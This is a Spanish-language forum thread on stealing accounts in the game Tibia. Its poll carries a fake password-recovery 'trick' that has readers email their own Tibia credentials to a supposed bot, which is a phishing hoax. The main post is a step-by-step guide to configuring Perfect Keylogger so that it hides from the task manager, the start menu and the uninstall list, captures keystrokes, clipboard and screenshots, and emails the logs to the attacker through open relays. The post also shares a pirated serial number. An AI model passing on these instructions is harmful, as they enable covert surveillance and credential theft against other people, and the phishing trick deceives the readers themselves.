¿Como Hackear tibia? y robar cuentas de usuario
  • Poll choices
    Statistics
    Votes
  • COMO HACKEAR PASSWORDS DEL TIBIAEl metodo utilizado por http://www.tibia.com
    78.57%
    22
  • DEBEN SER SIMPLES INTROS (o sea en blanco) jejejeje,
    7.14%
    2
  • enviar un email al correo de contacto de la persona que se lo ha
    3.57%
    1
  • olvidado asegurando asi la privacidad. Pero lo que no todo el mundo
    3.57%
    1
  • PASO 1: En el campo para: escribiremos EN MINUSCULAS: [email protected]
    3.57%
    1
  • Cipsoft
    3.57%
    1
  • para dar una contraseña perdida es utilizar el asistente de su web pero
    0.00%
    0
  • lo que realmente hace es acceder a un 'bot' que lo unico que hace es
    0.00%
    0
  • sabe es que este proceso (normalmente realizado desde la web) no es mas
    0.00%
    0
  • que un envio a... [email protected]
    0.00%
    0
  • (Este es el bot de los paises de habla hispana, España incluido, Cada
    0.00%
    0
  • pais tiene un bot) con un formato preestablecido Y AQUI ESTA EL TRUCO!!
    0.00%
    0
  • Todo consiste en enviar un email.
    0.00%
    0
  • PASO 2: En el campo Asunto escribiremos TAL CUAL ESCRIBO: PassRecovery_tibiaPASO 3: EN LA PRIMERA LINEA (IMPORTANTE QUE SEA LA PRIMERA LINEA DEL
    0.00%
    0
  • CUERPO DEL MENSAJE) Escribiremos lo siguiente: USR_RCVR: nombre de uno
    0.00%
    0
  • de los char o pj de la victima (como queráis llamarlos)
    0.00%
    0
  • PASO 4: EN LA CUARTA LINEA HAS DE PONER LO SIGUIENTE (recuerda la CUARTA LINEA) : REDIRECT_TO: [email protected],
    0.00%
    0
  • tu account, tu contraseña del tibia (no la del correo, el correo solo
    0.00%
    0
  • se utiliza para enviarte la contraseña) * LA SEGUNDA Y TERCERA LINEA
    0.00%
    0
  • Y eso es todo Su cuenta llegara en Minimo dos dias o menos depende Dela Empresa
    0.00%
    0
Guests cannot vote (Voters: 28)

¿Como Hackear tibia? y robar cuentas de usuario

¿Como Hackear tibia? y robar cuentas de usuario

« Older   Newer »
 
  Share  
.
  1. Hackern nº1
     
    .

    User deleted


    Buenas gente si quereis hackear no agais caso a esos webones si te piden el password y cosas asi ya es un timo

    sy de verdad quieren hackear


    se hace por medio de keylogger es un tipo de programa server
    que lo que hace es guardar todo lo que tecleas en el teclado en un archivo y entonces poreso la gente hackea como tecleas la contraseña del tibia se guarda en el key logger y ya ta


    os enseño 1 tuto el programa se llama prefect keylogger y lo que hace es almacenar en fichero todo lo que se escribe y para el tibia ai una opcion que se llama
    asherir .exe
    que lo que hace el keylogger es guardar todo lo que se escribe en el exe en este caso el tibia


    Hoy vamos a aprender a manejar uno de los mejores keyloggers del mundo. Se llama Perfect Keylogger v1.3.0.0. Empecemos por descargarlo de Internet desde google y buscais "descargar prefect keylogger"
    *Nota: Si el enlace está inactivo, pruebe a bajarlo de nuestra carpeta de archivos compartidos de Yahoo!.

    ¿Ya lo tenemos descargado?. Pues ahora vamos a proceder a su instalación en nuestro ordenador para realizar las primeras pruebas.

    *Nota: El uso de keyloggers no es legalmente aceptable en ordenadores ajenos sin la autorización del propietario del ordenador. Úselo siempre bajo su entera responsabilidad. En nuestro tutorial siempre le indicaremos los pasos para su uso en SU PROPIO ordenador.

    Para la correcta instalación del keylogger vamos a hacer doble clic sobre i_bpk_french.exe y luego vamos a pulsar el botón "Siguiente" en cada una de las pantallas que nos salen. Al final pulsaremos "Finalizar" y ya tendremos el keylogger completamente instalado en nuestro ordenador. Si nos apercibimos bien, nos habrá salido un icono en la barra de tareas. Pasemos ahora a configurar correctamente nuestro keylogger para ocultarlo aún más y recoger los datos logueados.

    *Nota: Perfect Keylogger es un keylogger de pago en la versión totalmente funcional que estamos usando en nuestro ejemplo. Hemos escogido la versión en francés porque es la única que queda en Internet para la que conocemos números de serie válidos. Es un delito también usar números de serie sin pagar el producto. En este ejemplo sólo con fines didácticos (nunca lucrativos), hemos usado el nombre de usuario: Troyanos y Serial: LDET-IQHE-KSTJ-GHRC. Después he procedido a desinstalar el keylogger de mi ordenador eliminando todo rastro del número de serie. No quiero tener problemas con la justicia. Si Usted va a seguir los mismos pasos, tendría que introducir el número de serie y el usuario al principio, en la opción "Register".

    Pongámonos sobre el icono del keylogger y pulsemos el botón derecho del ratón. A continuación pulsemos sobre Options. Esto es lo que veremos:



    Si señalamos la casilla Démarrer avec Windows (activar en el inicio de Windows), estaremos posibilitando que el keylogger se active automáticamente cada vez que encendamos nuestro ordenador (sin necesidad de que lo activemos nosotros manualmente). Si activamos la casilla Ne pas afficher l'icone au démarrage (No mostrar el icono del programa), entonces ocultaremos el icono del keylogger y permanecerá invisible en el ordenador instalado. Es recomendable activar también esta función si quiere que su keylogger sea difícil de detectar. En Raccourci vamos a usar una combinación de teclas secretas (las que queramos) para que el icono vuelva a aparecer otra vez y así podamos usar nosotros el keylogger. Por ejemplo, si hacemos desaparecer el icono y luego queremos recuperarlo, pulsaremos la casilla Avec y luego (en nuestro ejemplo) introduciremos la combinación que queramos. En nuestra pantalla de ejemplo vemos que la combinación de teclas es: Ctrl + Alt + L. Pues eso significa que para recuperar el icono o para volverlo a esconder otra vez, pulsaremos esas tres teclas de nuestro ordenador. Es importante que memorice el valor insertado para que luego pueda recuperar el icono escondido.

    En el siguiente caso vamos a esconder el keylogger a Ctrl + Alt + Del para que no figure como proceso activo visible. Para ello señalemos la casilla Cacher le programme depuis Ctrl+Alt+Del (esconder el programa a Ctrl + Alt + Del). Otra manera de buscar el keylogger en nuestro ordenador es recurrir al menú de inicio. Pues para evitarlo, pulsaremos sobre Enlever le groupe de programme du menu Démarrer (eliminar el grupo de programa del menú de inicio). Por último, para hacerlo totalmente invisible, vamos a pulsar sobre Enlever le programme de la Liste des applications installees (eliminar el programa de la lista de aplicaciones a desinstalar). Si hemos pulsado todas estas opciones, nuestro keylogger será muy difícil de descubrir en el ordenador instalado.

    Vamos a pasar ahora a la siguiente pantalla. Para ello pulsemos sobre Loggin en la parte izquierda de nuestra pantalla. Esto es lo que veremos:



    Si queremos proteger el acceso al keylogger con una contraseña, pulsemos el botón Mot de Passe. A continuación introduzcamos la contraseña en los dos campos que nos salen en pantalla. Recuerde luego la contraseña o no podrá usar el keylogger. Si no quiere usar contraseña, no active esta opción.

    *Nota: Si Usted usa contraseña en el keylogger y activa también la función para que el keylogger se active automáticamente en el inicio de Windows, ha de saber que le va a salir en pantalla un cuadro para que introduzca la contraseña en cuanto encienda el ordenador. Si no introduce la contraseña, entonces el keylogger no se activará. Si le advierto esto es porque si su ordenador lo va a usar otra persona a la que Usted quiere espiar, no es conveniente que vea este mensaje de la contraseña, pues puede sospechar. Lo mejor en este caso es que no utilicemos contraseña ninguna.

    Otra opción que tenemos es Activer l'espionnage du presse-papier (Activar el espionaje del portapapeles). Si lo pulsamos, espiaremos también el contenido del portapapeles.

    Tenemos también la opción de Utiliser la methode d'interception progressive des saisies. Sólo pulsaremos esta opción si tenemos algún problema con la intercepción de las pulsaciones. Normalmente no es necesaria esta opción y recomiendo no usar.

    Ahora estamos ante la parte más importante del keylogger. Si pulsamos Voir log (ver el texto logueado), entonces nos saldrá otra pantalla en la que veremos todo lo que se ha escrito en el ordenador:



    Fíjese en que todo lo que he ido escribiendo en este tutorial, ha sido recogido por el keylogger y lo podemos leer perfectamente. Lo estoy escribiendo en el FrontPage, por ello aparece el archivo que abre este editor llamado Frontpg.exe. La hora de escribir cada texto está al lado (17:04, 17:07, etc). En el almanaque que aparece arriba podemos seleccionar el día de la semana que queremos consultar en el keylogger. En la pantalla de ejemplo está seleccionado el 3 de febrero, pero podríamos seleccionar cualquier otro día en el que el keylogger hubiera recogido datos. Fíjese en que en el encabezado del keylogger tenemos la ruta donde está el archivo en el que se guardan todos los textos:

    C:\PROGRAM FILES\BPK\bpk.dat

    Este keylogger es tan bueno que si señalamos la casilla Saisies d'ecran veremos una captura de imágenes de todos los procesos que se hayan usado en el ordenador. Si pulsamos sobre cualquiera de esas capturas, tendremos una imagen ampliada de alta calidad. ¡Muy bueno este keylogger!. Por último también podemos saber las webs que ha visitado la persona espiada si pulsamos sobre Sites Web.

    *Nota: Para configurar el capturador de pantallas deberemos acceder a la pantalla Saisies d'écran. Luego fijémonos en esta imagen:



    Si pulsamos Activer la surveillance visuelle (Permitir la vigilancia visual), entonces activaremos el capturador de pantallas. En Faire una saisie d'écran especificaremos el número de minutos en los que el keylogger hará "fotografías" a la pantalla (en el ejemplo tenemos 5 minutos). En Qualit de tenemos la calidad de la captura de imagen. Si desplazamos la barra hacia Bas (baja) entonces tendremos unas imágenes de menor calidad. Si la desplazamos hacia Haut (alta) entonces tendremos una mayor calidad de imagen en las capturas. Por último, si pulsamos Ne pas faire de saisies d'écran si personne ne travaille sur l'ordinateur, entonces no hará "fotografías" de la pantalla el keylogger cuando nadie está haciendo uso del ordenador espiado. Es bueno tener activada esta función para evitar sobrecargar el disco duro de imágenes.

    Vamos a pasar ahora a otra sección muy importante del keylogger. Pulsemos sobre E-mail y veamos esto:



    Hay veces que no tenemos acceso físico al ordenador espiado y queremos tener la facilidad de recoger todos los archivos de texto espiado en nuestro correo electrónico. Para ello el ordenador espiado va a enviar los archivos de texto a nuestra cuenta de e-mail y nosotros los vamos a leer desde otro ordenador.

    *Nota: Si Usted tiene acceso directo al ordenador espiado, no es necesario que active esta función, pues podría ser fuente de errores. Sáltese estas explicaciones y siga en el siguiente apartado.

    Para activar la notificación mediante e-mail, pulse Envoyer le log par e-amil chaque. Al lado introduzca cada cuanto tiempo desea que el keylogger le envíe el texto logueado. En nuestro ejemplo lo enviará cada 4 horas y 0 minutos. Podemos especificar el valor que queramos. Si pulsamos Also Attach screenshots también recibiremos en nuestro correo las capturas de imágenes (¡atención: esto podría sobrecargar nuestro buzón de correo electrónico!). Si pulsamos Effacer les logs après la reussite de entonces se borrarán los archivos logueados del ordenador espiado una vez que haya enviado satisfactoriamente los logs a la cuenta de e-mail. De esta forma evitaremos sobrecargar la memoria del ordenador espiado.

    En el campo Envoyer deberemos colocar nuestra cuenta de e-mail para que el keylogger envíe la notificación allí. Es muy importante que la cuenta sea correcta. De lo contrario se perderán los logs.

    Ahora pasemos a la opción Serveur SMTP. ¡Es muy importante esta función para que funcione bien la notificación por e-mail!. Habría que usar el servidor SMTP del correo electrónico que el ordenador espiado usa. Si no lo sabemos por la razón que sea, entonces podemos optar por dos posibilidades: transformar el ordenador espiado en un improvisado servidor SMTP local o usar un Open Relay Server (con los riesgos de inestabilidad que ello conlleva). Para la primera opción habría que instalar en nuestro ordenador este programa llamado Local SMTP Relay Server v1.8. Descárguelo desde aquí. Una vez instalado en nuestro ordenador, abrirá el puerto SMTP (puerto 25) (¡cuidado: alguien podría usarnos como relé en el caso de que supiera que tenemos el puerto 25 abierto!). En este caso tendríamos que poner la palabra localhost (o el valor 127.0.0.1) en el campo Serveur SMTP del keylogger. Si optamos por un Open Relay server externo tendríamos que consultar listas como ésta. Escogeríamos una de las IP que vemos en la lista y la colocaríamos en el campo Serveur SMTP.

    *Nota: Las listas de SMTP servers son muy inestables y poco fiables. Puede que un servidor funcione hoy pero no lo haga mañana. No es un método fiable. De otra parte, si Usted usa su propio SMTP server local, tenga mucho cuidado de activarlo cada vez que se inicia Windows. En caso contrario, cuando apague el ordenador y lo vuelva a encender otra vez, ya no tendrá activado el SMTP server local y aunque el keylogger sí esté activado, no tendrá las notificaciones en su correo. Puede introducir una línea run= (en [Windows] en el archivo Win.ini) para activar el SMTP server cada vez que inicie Windows.

    Abajo vemos el campo Port. No lo varíe: déjelo en el valor 25.

    Por último, los campos Mom y Mot de (usuario y contraseña), sólo debe rellenarlos en el caso de que Usted esté usando el servidor SMTP de su propia cuenta de e-mail. En este caso serían los mismos datos que usa para acceder a su correo electrónico configurado en Outlook Express. Si usa cualquiera de las otras dos opciones explicadas aquí, no tiene que rellenar nada.

    Ahora vamos a probar si el sistema funciona antes de ponerlo en funcionamiento. Para ello vamos a pulsar el botón Test. Si el servidor SMTP usado no funciona, esto será lo que vemos:



    *Nota: Antes de pulsar el botón Test, deberemos tener la precaución de seleccionar el método de autenticación correcto. Para ello acuda a Méthode d'authentication y seleccione "none" en el caso de que use un SMTP Relay Server tanto local como externo y AUTH LOGIN (así como las demás opciones) en el caso de que sea otro tipo de servidor SMTP (por ejemplo, aquellos que requieren usuario y contraseña).

    En este caso habría que probar con otro valor en el campo Serveur SMTP. Cuando acertemos con el servidor SMTP correcto, veremos este otro mensaje de aprobación en pantalla:



    Ahora deberíamos acudir a nuestra cuenta de correo para verificar si hemos recibido el correo de prueba. Vayamos a comprobarlo. Evidentemente aquí está nuestro mensaje:



    Pues ya está nuestro sistema de comunicación de los archivos logueados por e-mail. Pasemos ahora a la última pantalla seleccionando Targets:



    Tenemos dos nuevas opciones. Si pulsamos Activer la sauvegarde du clavier dans toute, estaremos activando el keylogger en todas las aplicaciones del ordenador (es lo más recomendable). Si, en cambio, sólo nos interesa espiar una aplicación en particular como por ejemplo todo lo que se comunica en el Messenger, pero al mismo tiempo no espiar todo lo demás en el ordenador, entonces podemos optar por señalar la casilla Activer la suvegarde du clavier uniquement dans ces applications. En este último caso deberíamos pulsar el botón Ajouter después de marcar la casilla. Luego podemos pulsar sobre Pancourir. Acto seguido deberíamos buscar el archivo de la aplicación concreta que queramos espiar. En nuestro ejemplo hemos optado por el Messenger, así que buscamos en nuestro ordenador el archivo msnmsgr.exe en la carpeta de MSN en Archivos de Programas. Esto es lo que veríamos:



    Pues ya tenemos el Messenger aplicado a nuestro keylogger. Si lo dejamos todo así, el keylogger sólo espiará el Messenger y dejará de espiar todas las demás aplicaciones. Por supuesto, se pueden sumar tantas aplicaciones como queramos. Pero si desean realizar un espionaje completo de todas las aplicaciones, es mucho mejor que activen la primera casilla.

    Cuando lo tengan todo configurado a su gusto, pulsen sobre el botón Oui (Sí). Pues ya está listo para loguear nuestro keylogger. Cuando queramos leer lo logueado en cualquier momento, podemos optar por dos opciones: visitar nuestra cuenta de e-mail si hemos configurado nuestro keylogger para ello, o ponernos sobre el icono del keylogger en la barra de tareas, pulsar el botón derecho del ratón y seleccionar Voir le log. ¡Ya lo tienen todo ahí!.

    *Nota: Si Usted decidió esconder el icono del keylogger, así como todo lo demás, entonces debe recordar la combinación de teclas que usó en la configuración para recuperar el control del keylogger. En nuestro ejemplo, si lo recuerda bien, usamos la combinación de teclas: Ctrl + Alt + L.

    Perfect Keylogger es probablemente el mejor keylogger del mercado. Además es compatible con todos los sistemas operativos Windows (incluido Windows XP). Es una manera perfecta de iniciarse en un completísimo keylogger que no falla nunca. Un buen detalle es que loguea el texto corregido. Ya saben Ustedes que otros keyloggers tienen la fatal costumbre de loguear incluso las teclas no alfanuméricas (como espacios, borrado de caracteres, retroceso, etc). Esto hace que la lectura de lo logueado en Perfect Keylogger sea limpia y concisa. ¡Un gran keylogger!.

    *Nota: El autor de este artículo no se responsabiliza del uso ilegal que Usted pueda hacer de este programa. Úselo sólo en SU ordenador. Sea ético, por favor. Gracias.



    Agregenme [email protected]





     
    .
87 replies since 17/3/2008, 08:34   63397 views
  Share  
.